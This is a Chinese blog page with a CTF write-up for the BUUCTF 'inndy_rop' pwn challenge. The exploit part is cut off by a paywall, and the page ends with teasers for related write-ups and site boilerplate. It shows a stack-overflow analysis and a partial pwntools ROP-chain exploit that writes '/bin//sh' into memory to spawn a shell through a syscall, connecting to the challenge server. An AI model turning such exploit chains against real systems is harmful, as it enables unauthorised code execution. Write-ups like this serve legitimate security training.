BUUCTF-PWN-inndy_rop

最新推荐文章于 2024-09-01 20:54:51 发布
原创 最新推荐文章于 2024-09-01 20:54:51 发布 · 901 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

该文章展示了如何在没有system函数的情况下,通过使用ida分析和ROPgadget工具,构造rop链来实现栈溢出攻击。payload中包含了对内存地址的操纵,以执行特定的系统调用,如/bin/sh,以获取shell权限。

1.checksec

2.IDA

可以栈溢出,没有system函数,使用系统调用

利用ROPgadget的功能直接利用程序中的片段拼凑rop链 

ROPgadget --binary rop --ropchain

3.EXP

from pwn import*
from struct import pack

r=remote('node4.buuoj.cn',25383)

def payload():
        p='a'*(0xc+4)
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080b8016) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806ecda) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x080b8016) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x0805466b) # mov dword
最低0.47元/天 解锁文章
ROP-BUUCTF-inndy_rop(ret2syscall)
Welcome To Myon'Blog !
05-08 599
因为 pop dword ptr [ecx] 一次只能写入 4 个字节,所以我们分两次写入 /bin/sh。静态链接就意味着没法去打 ret2libc 了,因为 ret2libc 需要用到动态链接库里面的系统函数。后面就是常规的 ret2syscall 了,即系统调用 execve。既然有对 [ecx] 操作的,那么我们就继续找弹出 ecx 的指令。注意到左侧函数表有很多的函数,说明这个程序是静态链接的。找一个具有写权限的段,一般都是在 bss 段。找了一下,没有字符串 /bin/sh。
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1807
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
BUUCTF pwn——inndy_rop
CNS-Enterprise BCC-1701-J
05-16 352
BUUCTF 做题练习
inndy_rop
个人笔记
05-01 228
无法利用libc,所以利用rop构造系统调用。生成一键getshell的rop片段组合。单纯溢出,无直接利用点。
buuctf pwninndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 378
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
inndy-rop
m0_73743784的博客
09-01 537
其实就是直接全部使用 gadget 的 ROP,但是不得不说,确实是又学了一招。
[BUUCTF-pwn]——inndy_rop
Y_peak的博客
03-18 441
[BUUCTF-pwn]——inndy_rop main函数无法反汇编,不过还好,里面的overflow就是gets函数,可以栈溢出。 因为懒得自己去构造rop链了,看看里面是否可以拼凑出系统的调用 里面有就省的我们自己写了 中间还找了半天错,我真是个笨蛋,以前一直用p 忘记和和构造系统调用的变量重复了,改为a就好了 exploit from pwn import * from struct import pack a = remote('node3.buuoj.cn',27139) # Padding
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
BUUCTF--pwn--inndy_rop【ret2syscall】
qq_73149934的博客
12-24 434
BUUCTF--pwn--inndy_rop
buu|inndy_rop 1
m0_64236521的博客
06-19 230
buuctf|inndy_rop 1
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 724
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
buuctf-pwn-inndy_rop-wp
xuaohu123的博客
01-08 427
buuctf-pwn-innd_rop 查看文件保护 32位程序,开启了nx保护。
[BJDCTF 2nd]secret&&inndy_rop
、moddemod
07-20 635
[BJDCTF 2nd]secret exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './secret' p = process(proc_name) # p = remote('node3.buuoj.cn', 28831)
buuctf ---- ROP集合(未完)
L0g1c的博客
01-27 2823
buuctf ---------- babyrop1 NX栈不可执行开启 使用32位IDA查看程序 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 a1可以是255,造成buf溢出。 编写exp from pwn import * from LibcSearcher import * io=remote("node4.buuoj.cn",28966) elf=ELF("pwn") write_plt=elf.plt['write'] puts_
BUUCTF - PWN】baby_rop
古月浪子的博客
04-05 458
checksec一下,栈溢出 IDA打开看看,很明显的溢出点,/bin/sh字符串在程序里也有现成的,通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1419
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值